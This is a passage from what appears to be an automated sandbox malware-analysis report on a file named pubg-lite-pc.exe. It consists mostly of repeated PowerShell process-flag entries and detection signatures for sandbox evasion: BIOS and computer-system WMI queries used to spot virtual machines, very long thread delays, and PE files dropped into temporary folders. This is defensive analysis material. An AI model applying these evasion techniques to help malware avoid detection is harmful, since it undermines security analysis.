Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2496Thread sleep count: 9040 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6044Thread sleep count: 9083 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2584Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3096Thread sleep count: 9101 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6456Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1320Thread sleep count: 9022 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6860Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6232Thread sleep count: 9043 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi5E5.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI101A.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shiE992.tmpJump to dropped file
Source: C:\Users\user\Desktop\pubg-lite-pc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shiE676.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shiEAFA.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1ADC.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI395.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA27C.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2F8.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI1115.tmpJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi4BB.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI19B2.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI7331.tmpJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9040Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9083Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9101
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9022
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9043
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: GetAdaptersInfo,GetAdaptersInfo,1_2_6D9645D0
Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
